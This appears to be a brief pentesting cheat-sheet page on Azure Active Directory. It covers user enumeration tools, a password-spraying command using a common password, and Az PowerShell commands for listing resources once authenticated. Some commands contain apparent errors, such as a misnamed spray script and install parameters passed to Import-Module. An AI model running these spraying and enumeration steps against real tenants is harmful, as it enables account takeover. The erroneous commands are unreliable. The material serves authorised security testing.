Pentesting Azure Active Directory

Unauthenticated Recon

User Email Enumeration

https://github.com/nyxgeek/onedrive_user_enum

python3 onedrive_enum.py -U users.txt -d companyname.com -v

If the output urls gave us 404 File Not Found , that mean it's a bad/invalid users or

If it redirect to sigin page, that mean it's a valid user account.

Valid Email Enumeration

https://github.com/LMGsec/o365creeper

python3 o365creeper.py -e test@email.com
python3 o365creeper.py -f email-list.txt -o validated-out-file.txt

Cloud Enum

https://github.com/initstring/cloud_enum

python3 cloud_enum.py -k tesla --disable-aws --disable-gcp

Password Spraying

https://github.com/dafthack/MSOLSpray

Import-Module .\MSQLSpray.ps1
Invoke-MSOLSpray -UserList .\mails.txt.txt -Password P@ssword123

Authenticated Recon

First, we need to install Azure Az powershell module

Import-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force

Connect Azure account with Connect-AzAccount

Enumerating with Powershell

# List current users context available
Get-AzContext -ListAvailable
# Getting subscription
Get-AzSubscription
# Current user's role assignment
Get-AzRoleAssignment
# List all the resources and group
Get-AzResource
Get-AzResourceGroup
# List storage accounts
Get-AzStorageAccount
# List all WebApp for exploit
Get-AzWebApp
# List Automation Account
Get-AzAutomationAccount
# Display all the virtual network
Get-AzVirtualNetwork
# Getting public ip address
Get-AzPublicIpAddress

Continues...

PreviousBuffer Overflow NextAttacking JSON Web Token

Last updated 3 years ago